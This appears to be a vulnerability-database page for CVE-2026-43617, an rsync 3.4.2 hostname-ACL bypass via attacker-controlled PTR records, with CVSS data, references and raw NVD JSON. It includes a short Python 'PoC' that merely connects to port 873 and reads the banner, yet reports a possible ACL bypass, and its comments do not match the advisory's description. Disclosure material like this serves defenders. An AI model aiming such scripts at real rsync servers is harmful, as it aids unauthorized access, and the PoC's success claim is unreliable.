CVE-2026-43617

Description

Rsync version 3.4.2 and prior contain an authorization bypass vulnerability in the rsync daemon's hostname-based access control list enforcement when configured with chroot. Attackers can bypass hostname-based deny rules by controlling the PTR record for their source IP address, allowing connections from hostnames that administrators intended to deny when reverse DNS resolution fails and defaults to UNKNOWN.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Rsync <= 3.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Proof of Concept for CVE-2026-43617
# This script demonstrates the connection attempt assuming the attacker controls the PTR record of the source IP.
# Requirement: The attacker's IP address must resolve to a hostname allowed by the rsync "hosts allow" directive.

TARGET_HOST = "192.168.1.10" # Replace with target IP
TARGET_PORT = 873

def attempt_rsync_connection():
    try:
        print(f"[+] Attempting to connect to {TARGET_HOST}:{TARGET_PORT}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(10)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # Receive the server banner
        banner = s.recv(1024).decode()
        print(f"[+] Server Banner: {banner.strip()}")
        
        # If connected, the ACL bypass based on hostname (PTR) was successful
        print("[+] Connection established. ACL bypass potentially successful.")
        
        s.close()
    except Exception as e:
        print(f"[-] Connection failed: {e}")

if __name__ == "__main__":
    print("[*] CVE-2026-43617 PoC: Rsync Authorization Bypass via Hostname Resolution")
    print("[*] Ensure your reverse DNS (PTR) points to an allowed hostname.")
    attempt_rsync_connection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43617
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43617
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43617/
[4] VulDB https://vuldb.com/cve/CVE-2026-43617
[5] https://github.com/RsyncProject/rsync/releases/tag/v3.4.3
[6] https://github.com/RsyncProject/rsync/security/advisories/GHSA-rjfm-3w2m-jf4f
[7] https://www.vulncheck.com/advisories/rsync-authorization-bypass-via-hostname-resolution

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43617", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:36.233", "lastModified": "2026-05-20T13:58:07.923", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rsync version 3.4.2 and prior contain an authorization bypass vulnerability in the rsync daemon's hostname-based access control list enforcement when configured with chroot. Attackers can bypass hostname-based deny rules by controlling the PTR record for their source IP address, allowing connections from hostnames that administrators intended to deny when reverse DNS resolution fails and defaults to UNKNOWN."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-289"}]}], "references": [{"url": "https://github.com/RsyncProject/rsync/releases/tag/v3.4.3", "source": "[email protected]"}, {"url": "https://github.com/RsyncProject/rsync/security/advisories/GHSA-rjfm-3w2m-jf4f", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/rsync-authorization-bypass-via-hostname-resolution", "source": "[email protected]"}]}}